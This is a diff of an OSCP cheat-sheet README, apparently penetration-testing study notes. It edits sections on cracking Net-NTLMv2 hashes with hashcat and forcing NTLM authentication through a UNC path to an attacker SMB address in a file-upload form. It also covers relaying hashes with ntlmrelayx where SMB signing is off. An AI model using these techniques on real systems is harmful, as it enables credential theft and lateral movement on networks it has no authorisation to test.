peterkhe1999/CheatSheet/OSCP/README.md

 hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
 ```

 If we **don't have code execution**, use other vectors to force an authentication.

-E.g., a **file upload** form in a web application on a Windows server, try to enter a non-existing file with a UNC path like `\\192.168.119.2\share\nonexistent.txt`.
+E.g., Enter a non-existing file with a UNC path like `\\192.168.119.2\share\nonexistent.txt` in a **file upload** form in a web application on a Windows server.
 If the web application supports uploads via **SMB**, the Windows server will authenticate to our SMB server.

 ### Relaying Net-NTLMv2

-If we have access to **FILES01** as an **unprivileged** user => cannot run Mimikatz to extract passwords.
+- If we cannot run Mimikatz to extract passwords, e.g. have access to **FILES01** as an **unprivileged** user.

-We also obtained Net-NTLMv2 hash the couldn't crack it because it was too complex.
+- We also obtained Net-NTLMv2 hash the couldn't crack it.
+- **SMB signing** is being set to False.

-If the user may be a **local administrator on another machine** => try to use the hash on another machine: **relay attack**.
+=> Try to use the hash on another machine, i.e. **relay attack** because the user may be a **local administrator on another machine**.

-Due to SMB signing being set to False => a relay attacks is possible
+**ntlmrelayx** received an SMB connection and used it to authenticate to our target by relaying it

 * --no-http-server: disable the HTTP server since we are relaying an SMB connection
 * -smb2support: add support for SMB2